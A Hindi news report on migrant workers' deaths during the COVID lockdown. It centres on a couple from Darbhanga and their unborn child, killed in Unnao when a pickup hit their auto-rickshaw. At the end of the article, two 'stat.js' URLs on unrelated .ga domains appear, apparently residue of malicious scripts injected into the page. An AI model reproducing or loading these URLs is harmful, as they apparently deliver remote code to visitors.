कोरोना के कारण प्रवासी मजदूरों पर आफत का सैलाब टूट पड़ा है. बीते दिन औरैया में सड़क हा’दसे में 34 प्रवासी मजदूरों की जा’न चली गई, आज यूपी के उन्नाव जिले में टेंपू के सड़क हादसे में पति पत्नी और गर्भ में पल रहे बच्चे की मौ’त हो गई. 70 वर्षीय पिता के बुढ़ापे का सहारा  उनका बेटा चला गया।

जानकारी के मुताबिक हरियाणा से दरभंगा लौट रहे दंपति अपने बेटे के साथ खुद के खरीदे हुए ऑटो से अपने गंतव्य के लिए निकले थे, रास्ते में ऑटो का पेट्रोल खत्म होने के वजह से सड़क के किनारे टेम्पू खड़ी करके पेट्रोल भर रहे थे तभी अचानक पीछे से आ रही तेज रफ्तार पिकअप ने टक्कर मार दी इस हादसे में पति और पत्नी की मौ’त हो गई जबकि सड़क से कुछ दूर उनका बेटा पेसाब कर रहा था, इस हादसे में सिर्फ उनका बेटा कृष्णा ही बचा है. गर्भ में पल रहे बच्चे ने अपने माता-पिता के साथ बिना इस धरती पर पांव रखे ही चला गया।

यह खबर जैसे ही उनके गांव दरभंगा पहुंची तो उनके पिता और पूरे घर वालों का रो रो कर बुरा हाल हो गया पिता ने इन्हें आने से मना किया था लेकिन लॉक डाउन के वजह से दंपति की आर्थिक स्थिति बुरी हो गई थी इस वजह से वे अपने ही ऑटो से अपने गांव के लिए निकल पड़े थे. इस घटना के बाद इस दुख की घड़ी में ना ही कोई जनप्रतिनिधि पहुंचा ना ही कोई बड़े प्रशासनिक अधिकारी पहुंचे।https://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms

Leave a Reply

Your email address will not be published.